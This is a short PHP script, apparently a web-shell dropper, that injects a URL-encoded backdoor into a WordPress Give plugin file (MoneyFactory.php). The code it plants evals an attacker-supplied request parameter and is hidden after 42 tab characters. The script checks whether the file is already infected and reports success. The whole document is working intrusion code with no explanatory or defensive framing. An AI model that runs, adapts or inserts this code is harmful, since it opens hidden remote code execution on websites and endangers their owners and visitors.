<?php  $path = '/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-content/plugins/give/vendor/moneyphp/money/src/MoneyFactory.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('eval%28%24_REQUEST%5B%27FzoFwY%27%5D%29%3B'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');